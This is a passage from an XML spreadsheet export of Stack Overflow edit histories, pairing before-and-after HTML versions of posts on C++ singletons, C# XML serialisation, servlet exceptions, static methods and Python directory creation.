  </si>
  <si>
    <t>Todd Gamblin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Why does everybody want to return a singleton as a pointer?&lt;br&gt; Return it as a reference seems much more logical!&lt;/p&gt; _x000D_
 &lt;p&gt; You should never be able to free a singleton manually. How do you know who is keeping a reference to the singleton? If you don't know (or can't guarantee) nobody has a reference (in your case via a pointer) then you have no business freeing the object.&lt;/p&gt; _x000D_
 &lt;p&gt; Use the static in a function method.&lt;br&gt; This guarantees that it is created and destroyed only once. It also gives you lazy initialization for free.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class S_x000D_
{_x000D_
    public:_x000D_
        static S&amp;amp; getInstance()_x000D_
        {_x000D_
            static S    instance;_x000D_
            return instance;_x000D_
        }_x000D_
    private:_x000D_
        S() {}_x000D_
        S(S const&amp;amp;);              // Don't Implement._x000D_
        &lt;span class="diff-delete"&gt;S&amp;amp;&lt;/span&gt; operator=(S const&amp;amp;);&lt;span class="diff-delete"&gt;  &lt;/span&gt; // Don't implement_x000D_
 };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note you also need to make the constructor private. Also make sure that you override the default copy constructor and assignment operator so that you can not make a copy of the singleton (otherwise it would not be a singleton).&lt;/p&gt; _x000D_
 &lt;p&gt; Also read:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/a/1008289/14065"&gt;http://stackoverflow.com/a/1008289/14065&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/86582/singleton-how-should-it-be-used"&gt;Singleton: How should it be used&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/1008019/c-singleton-design-pattern/1008289#1008289"&gt;C++ Singleton design pattern&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; To make sure you are using a singleton for the correct reasons.&lt;/p&gt; _x000D_
 &lt;p&gt; Though technically not thread safe in the general case see:&lt;br&gt; &lt;a href="http://stackoverflow.com/questions/246564/what-is-the-lifetime-of-a-static-variable-in-a-c-function"&gt;What is the lifetime of a static variable in a C++ function?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; GCC has an explicit patch to compensate for this:&lt;br&gt; &lt;a href="http://gcc.gnu.org/ml/gcc-patches/2004-09/msg00265.html" rel="nofollow noreferrer"&gt;http://gcc.gnu.org/ml/gcc-patches/2004-09/msg00265.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Why does everybody want to return a singleton as a pointer?&lt;br&gt; Return it as a reference seems much more logical!&lt;/p&gt; _x000D_
 &lt;p&gt; You should never be able to free a singleton manually. How do you know who is keeping a reference to the singleton? If you don't know (or can't guarantee) nobody has a reference (in your case via a pointer) then you have no business freeing the object.&lt;/p&gt; _x000D_
 &lt;p&gt; Use the static in a function method.&lt;br&gt; This guarantees that it is created and destroyed only once. It also gives you lazy initialization for free.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class S_x000D_
{_x000D_
    public:_x000D_
        static S&amp;amp; getInstance()_x000D_
        {_x000D_
            static S    instance;_x000D_
            return instance;_x000D_
        }_x000D_
    private:_x000D_
        S() {}_x000D_
        S(S const&amp;amp;);              // Don't Implement._x000D_
        &lt;span class="diff-add"&gt;void&lt;/span&gt; operator=(S const&amp;amp;); // Don't implement_x000D_
 };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note you also need to make the constructor private. Also make sure that you override the default copy constructor and assignment operator so that you can not make a copy of the singleton (otherwise it would not be a singleton).&lt;/p&gt; _x000D_
 &lt;p&gt; Also read:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/a/1008289/14065"&gt;http://stackoverflow.com/a/1008289/14065&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/86582/singleton-how-should-it-be-used"&gt;Singleton: How should it be used&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/1008019/c-singleton-design-pattern/1008289#1008289"&gt;C++ Singleton design pattern&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; To make sure you are using a singleton for the correct reasons.&lt;/p&gt; _x000D_
 &lt;p&gt; Though technically not thread safe in the general case see:&lt;br&gt; &lt;a href="http://stackoverflow.com/questions/246564/what-is-the-lifetime-of-a-static-variable-in-a-c-function"&gt;What is the lifetime of a static variable in a C++ function?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; GCC has an explicit patch to compensate for this:&lt;br&gt; &lt;a href="http://gcc.gnu.org/ml/gcc-patches/2004-09/msg00265.html" rel="nofollow noreferrer"&gt;http://gcc.gnu.org/ml/gcc-patches/2004-09/msg00265.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>kol</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I had designed my site with a fixed background image of size 900 x 600. In computer its looks better. How it will looks in PDA device.. Whether i have to design it separately for PDA?&lt;/p&gt; _x000D_
 &lt;p&gt; What should i do? please suggest me..&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I had designed my site with a fixed background image of size 900 x 600. In computer its looks better. How it will looks in PDA device.. Whether i have to design it separately for PDA?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; How should check whether my site browsed from mobile phone..&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; What should i do? please suggest me..&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>praveenjayapal</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hi let's make a list of answers where you post your excellent and favorite extension code.&lt;/p&gt; _x000D_
 &lt;p&gt; The requirement is that the full code must be posted and a example and an explanation on how to use it.&lt;/p&gt; _x000D_
 &lt;p&gt; Then lets give the best extension ever the highest vote. ;-)&lt;/p&gt; _x000D_
 &lt;p&gt; Based on the high interest in this topic I will setup an Open Source Project on &lt;a href="http://www.codeplex.com/extensionmethod" rel="nofollow noreferrer"&gt;Codeplex&lt;/a&gt;. Please drop me a note if you what to contribute to the project of a shared Extension Library for the public.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hi let's make a list of answers where you post your excellent and favorite extension code.&lt;/p&gt; _x000D_
 &lt;p&gt; The requirement is that the full code must be posted and a example and an explanation on how to use it.&lt;/p&gt; _x000D_
 &lt;p&gt; Then lets give the best extension ever the highest vote. ;-)&lt;/p&gt; _x000D_
 &lt;p&gt; Based on the high interest in this topic I will setup an Open Source Project on &lt;a href="http://www.codeplex.com/extensionmethod" rel="nofollow noreferrer"&gt;Codeplex&lt;/a&gt;. Please drop me a note if you what to contribute to the project of a shared Extension Library for the public.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Please mark your answers with an acceptance to put the code in the Codeplex project.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>bovium</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; By all means put this in the codeplex project.&lt;/p&gt; _x000D_
 &lt;p&gt; Serialising / Deserialising objects to Xml:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;    &lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;summary&amp;gt;&lt;/span&gt;Serialises an object of type T in to an xml string&lt;span class="hljs-doctag"&gt;&amp;lt;/summary&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;typeparam name="T"&amp;gt;&lt;/span&gt;Any class type&lt;span class="hljs-doctag"&gt;&amp;lt;/typeparam&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;param name="objectToSerialise"&amp;gt;&lt;/span&gt;Object to serialise&lt;span class="hljs-doctag"&gt;&amp;lt;/param&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;returns&amp;gt;&lt;/span&gt;A string that represents Xml, empty oterwise&lt;span class="hljs-doctag"&gt;&amp;lt;/returns&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; &lt;span class="hljs-title"&gt;XmlSerialise&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-keyword"&gt;this&lt;/span&gt; T objectToSerialise&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : &lt;span class="hljs-keyword"&gt;class&lt;/span&gt;, &lt;span class="hljs-keyword"&gt;new&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt; _x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; serialiser = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; XmlSerializer(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T));_x000D_
  &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; xml;_x000D_
  &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; writer = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringWriter())_x000D_
  {_x000D_
    serialiser.Serialize(writer, objectToSerialise);_x000D_
    xml = writer.ToString();_x000D_
  }_x000D_
_x000D_
  xml = xml.Substring(xml.IndexOf(Convert.ToChar(&lt;span class="hljs-number"&gt;60&lt;/span&gt;)));_x000D_
  xml = xml.Substring(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, (xml.LastIndexOf(Convert.ToChar(&lt;span class="hljs-number"&gt;62&lt;/span&gt;)) + &lt;span class="hljs-number"&gt;1&lt;/span&gt;));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; xml;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;summary&amp;gt;&lt;/span&gt;Deserialises an xml string in to an object of Type T&lt;span class="hljs-doctag"&gt;&amp;lt;/summary&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;typeparam name="T"&amp;gt;&lt;/span&gt;Any class type&lt;span class="hljs-doctag"&gt;&amp;lt;/typeparam&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;param name="xml"&amp;gt;&lt;/span&gt;Xml as string to deserialise from&lt;span class="hljs-doctag"&gt;&amp;lt;/param&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;returns&amp;gt;&lt;/span&gt;A new object of type T is successful, null if failed&lt;span class="hljs-doctag"&gt;&amp;lt;/returns&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; T &lt;span class="hljs-title"&gt;XmlDeserialise&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-keyword"&gt;this&lt;/span&gt; &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; xml&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : &lt;span class="hljs-keyword"&gt;class&lt;/span&gt;, &lt;span class="hljs-keyword"&gt;new&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt;_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; serialiser = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; XmlSerializer(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T));_x000D_
  T newObject;_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; reader = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringReader(xml))_x000D_
  {_x000D_
     newObject = serialiser.Deserialize(reader) &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;as&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;T;&lt;/span&gt; _x000D_
  }_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; newObject;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; When building the serialisation I had a help from an online example - but cannot remeber where it is...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; By all means put this in the codeplex project.&lt;/p&gt; _x000D_
 &lt;p&gt; Serialising / Deserialising objects to Xml:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;    &lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;summary&amp;gt;&lt;/span&gt;Serialises an object of type T in to an xml string&lt;span class="hljs-doctag"&gt;&amp;lt;/summary&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;typeparam name="T"&amp;gt;&lt;/span&gt;Any class type&lt;span class="hljs-doctag"&gt;&amp;lt;/typeparam&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;param name="objectToSerialise"&amp;gt;&lt;/span&gt;Object to serialise&lt;span class="hljs-doctag"&gt;&amp;lt;/param&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;returns&amp;gt;&lt;/span&gt;A string that represents Xml, empty oterwise&lt;span class="hljs-doctag"&gt;&amp;lt;/returns&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; &lt;span class="hljs-title"&gt;XmlSerialise&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-keyword"&gt;this&lt;/span&gt; T objectToSerialise&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : &lt;span class="hljs-keyword"&gt;class&lt;/span&gt;, &lt;span class="hljs-keyword"&gt;new&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt; _x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; serialiser = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; XmlSerializer(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T));_x000D_
  &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; xml;_x000D_
  &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; writer = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringWriter())_x000D_
  {_x000D_
    serialiser.Serialize(writer, objectToSerialise);_x000D_
    xml = writer.ToString();_x000D_
  }_x000D_
_x000D_
  xml = xml.Substring(xml.IndexOf(Convert.ToChar(&lt;span class="hljs-number"&gt;60&lt;/span&gt;)));_x000D_
  xml = xml.Substring(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, (xml.LastIndexOf(Convert.ToChar(&lt;span class="hljs-number"&gt;62&lt;/span&gt;)) + &lt;span class="hljs-number"&gt;1&lt;/span&gt;));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; xml;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;summary&amp;gt;&lt;/span&gt;Deserialises an xml string in to an object of Type T&lt;span class="hljs-doctag"&gt;&amp;lt;/summary&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;typeparam name="T"&amp;gt;&lt;/span&gt;Any class type&lt;span class="hljs-doctag"&gt;&amp;lt;/typeparam&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;param name="xml"&amp;gt;&lt;/span&gt;Xml as string to deserialise from&lt;span class="hljs-doctag"&gt;&amp;lt;/param&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;&lt;span class="hljs-doctag"&gt;///&lt;/span&gt; &lt;span class="hljs-doctag"&gt;&amp;lt;returns&amp;gt;&lt;/span&gt;A new object of type T is successful, null if failed&lt;span class="hljs-doctag"&gt;&amp;lt;/returns&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; T &lt;span class="hljs-title"&gt;XmlDeserialise&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-keyword"&gt;this&lt;/span&gt; &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; xml&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : &lt;span class="hljs-keyword"&gt;class&lt;/span&gt;, &lt;span class="hljs-keyword"&gt;new&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt;_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; serialiser = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; XmlSerializer(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T));_x000D_
  T newObject;_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; reader = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringReader(xml))_x000D_
  {_x000D_
    &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;try&lt;/span&gt; {&lt;/span&gt; newObject = &lt;span class="diff-add"&gt;(T)&lt;/span&gt;serialiser.Deserialize(reader)&lt;span class="diff-add"&gt;;&lt;/span&gt; &lt;span class="diff-add"&gt;}_x000D_
&lt;/span&gt; &lt;span class="diff-add"&gt;   catch { &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-literal"&gt;null&lt;/span&gt;; } &lt;span class="hljs-comment"&gt;// Could not&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-comment"&gt; &lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-comment"&gt;be deserialized to this type.&lt;/span&gt;&lt;/span&gt;_x000D_
  }_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; newObject;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; When building the serialisation I had a help from an online example - but cannot remeber where it is...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>TWith2Sugars</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Are Adobe's plugin architectures for Photoshop and Lightroom related in any way? &lt;span class="diff-delete"&gt;I.e. if&lt;/span&gt; I have source code for a plugin, that works with PS 3.0-CS3 as well as PS Elements 6.0 can I use it with Lightroom directly? If not, what would I have to modify?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Are Adobe's plugin architectures for Photoshop and Lightroom related in any way? &lt;span class="diff-add"&gt;If&lt;/span&gt; I have source code for a plugin, that works with PS 3.0-CS3 as well as PS Elements 6.0 can I use it with Lightroom directly? If not, what would I have to modify?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>rjzii</t>
  </si>
  <si>
    <t>sblundy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;You&lt;/span&gt; may wish to use &lt;a href="http://msdn.microsoft.com/en-us/library/system.componentmodel.editorbrowsableattribute.aspx" rel="nofollow noreferrer"&gt;editorbrowsableattribute&lt;/a&gt; which will hide the method from intellisense. You can still call it, but it slows down devs from calling something that could blow up the program, and will usually force them to read your giant comment-warnings.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;protected is the correct approach here. But in another situation, you&lt;/span&gt; may wish to use &lt;a href="http://msdn.microsoft.com/en-us/library/system.componentmodel.editorbrowsableattribute.aspx" rel="nofollow noreferrer"&gt;editorbrowsableattribute&lt;/a&gt; which will hide the method from intellisense. You can still call it, but it slows down devs from calling something that could blow up the program, and will usually force them to read your giant comment-warnings.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tom Ritter</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'd recommend throwing a &lt;code&gt;RuntimeException&lt;/code&gt; from &lt;code&gt;ServletContextListener.contextInitialized&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Servlet 2.3 wasn't very clear on this, but Servlet 2.4 added the following detail&lt;span class="diff-delete"&gt;, carried into &lt;/span&gt;&lt;a href="https://jcp.org/en/jsr/detail?id=340" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Servlet 3.1&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; Section 11.6&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Some exceptions do not occur under the call stack of another component in the application. An example of this is a â€¦ ServletContextListener that throws an unhandled exception during a notification of servlet context initializationâ€¦. In this case, the Developer has no opportunity to handle the exception. The container &lt;strong&gt;may&lt;/strong&gt; respond to all subsequent requests to the Web application with an HTTP status code 500 to indicate an application error.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Since it says that the servlet engine "may" disable access to application, you might find a server that does something else. However, Tomcat and WebLogic both disable the application, and the only other reasonable thing I can think of would be to ignore the exception. I can't see a container that did that being very popularâ€”so you'd better test it in WebSphere yourself.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'd recommend throwing a &lt;code&gt;RuntimeException&lt;/code&gt; from &lt;code&gt;ServletContextListener.contextInitialized&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Servlet 2.3 wasn't very clear on this, but Servlet 2.4 added the following detail:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Some exceptions do not occur under the call stack of another component in the application. An example of this is a â€¦ ServletContextListener that throws an unhandled exception during a notification of servlet context initializationâ€¦. In this case, the Developer has no opportunity to handle the exception. The container &lt;strong&gt;may&lt;/strong&gt; respond to all subsequent requests to the Web application with an HTTP status code 500 to indicate an application error.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Since it says that the servlet engine "may" disable access to application, you might find a server that does something else. However, Tomcat and WebLogic both disable the application, and the only other reasonable thing I can think of would be to ignore the exception. I can't see a container that did that being very popularâ€”so you'd better test it in WebSphere yourself.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Basil Bourque</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When I'm writing a class, most methods fall into two categories:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Methods that use/change the current instance's state.&lt;/li&gt; _x000D_
  &lt;li&gt; Helper methods that don't use/change the current object's state, but help me compute values I need elsewhere.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Static methods are useful, because just by looking at its signature, you know that the calling it doesn't use or modify the current instance's state.&lt;/p&gt; _x000D_
 &lt;p&gt; Take this example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;public class Library_x000D_
{_x000D_
    private static Book FindBook(List&amp;lt;Book&amp;gt; books, string title)_x000D_
    {_x000D_
        // code goes here_x000D_
    }_x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If an instance of library's state ever gets screwed up, and I'm trying to figure out why, I can rule out &lt;code&gt;&lt;span class="diff-delete"&gt;FindBook&lt;/span&gt;&lt;/code&gt; as the culprit, just from its signature.&lt;/p&gt; _x000D_
 &lt;p&gt; I try to communicate as much as I can with a method or function's signature, and this is an excellent way to do that.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When I'm writing a class, most methods fall into two categories:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Methods that use/change the current instance's state.&lt;/li&gt; _x000D_
  &lt;li&gt; Helper methods that don't use/change the current object's state, but help me compute values I need elsewhere.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Static methods are useful, because just by looking at its signature, you know that the calling it doesn't use or modify the current instance's state.&lt;/p&gt; _x000D_
 &lt;p&gt; Take this example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;public class Library_x000D_
{_x000D_
    private static Book findBook(List&amp;lt;Book&amp;gt; books, string title)_x000D_
    {_x000D_
        // code goes here_x000D_
    }_x000D_
}&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If an instance of library's state ever gets screwed up, and I'm trying to figure out why, I can rule out &lt;span class="diff-add"&gt;findBook&lt;/span&gt; as the culprit, just from its signature.&lt;/p&gt; _x000D_
 &lt;p&gt; I try to communicate as much as I can with a method or function's signature, and this is an excellent way to do that.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Neil</t>
  </si>
  <si>
    <t>Marcos Dimitrio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I see two answers with good qualities, each with a small flaw, so I will give my take on it:&lt;/p&gt; _x000D_
 &lt;p&gt; Try &lt;a href="https://docs.python.org/2/library/os.path.html#os.path.exists" rel="nofollow noreferrer"&gt;&lt;code&gt;os.path.exists&lt;/code&gt;&lt;/a&gt;, and consider &lt;a href="https://docs.python.org/2/library/os.html#os.makedirs" rel="nofollow noreferrer"&gt;&lt;code&gt;os.makedirs&lt;/code&gt;&lt;/a&gt; for the creation.&lt;/p&gt; _x000D_
